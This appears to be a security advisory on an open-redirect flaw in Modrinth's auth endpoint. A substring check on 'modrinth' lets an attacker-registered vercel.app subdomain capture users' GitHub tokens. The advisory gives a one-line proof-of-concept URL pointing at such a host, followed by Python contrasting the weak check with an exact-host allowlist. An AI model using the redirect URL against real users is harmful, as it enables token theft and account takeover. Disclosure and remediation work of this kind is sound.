Account Takeover
# Description
A malicious actor can set up a website on vercel.app under the vercel.app domain and then change its subdomain to something containing "modrinth". This enables an open redirect through "https://api.modrinth.com/v2/auth/init?url=ATTACKER_URL", allowing the GitHub token to be stolen, which permits full account takeover.
# Proof of Concept
```
https://api.modrinth.com/v2/auth/init?url=https://test-modrinth.vercel.app/api/hello
```
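The root cause described above is a host check that matches on the substring "modrinth" rather than on the exact host. The following Python is an added illustration (not code from this advisory or from Modrinth) that contrasts such a substring check with an exact-host allowlist; the allowlist contents and function names are assumptions.

```python
from urllib.parse import urlparse

# Constructed allowlist of hosts a post-login redirect may legitimately target.
ALLOWED_HOSTS = {"modrinth.com", "www.modrinth.com", "api.modrinth.com"}


def is_safe_redirect_naive(url: str) -> bool:
    """Weak check: accepts any URL whose text contains 'modrinth'.

    Assumed reconstruction of the kind of validation the advisory implies;
    it is not Modrinth's actual code. A host such as test-modrinth.vercel.app
    passes, which is exactly the open redirect the report describes.
    """
    return "modrinth" in url.lower()


def is_safe_redirect(url: str) -> bool:
    """Hardened check: parse the URL and compare the real host exactly."""
    try:
        parts = urlparse(url)
    except ValueError:
        return False
    # Require an absolute https URL; rejects "//evil.example" and http://.
    if parts.scheme != "https":
        return False
    # .hostname strips userinfo ("modrinth.com@evil.example" -> evil.example)
    # and the port; normalise case and a trailing dot.
    host = (parts.hostname or "").lower().rstrip(".")
    if host in ALLOWED_HOSTS:
        return True
    # Accept subdomains only on a label boundary: "test-modrinth.vercel.app"
    # and "modrinth.com.evil.example" both fail this test.
    return host.endswith(".modrinth.com")
```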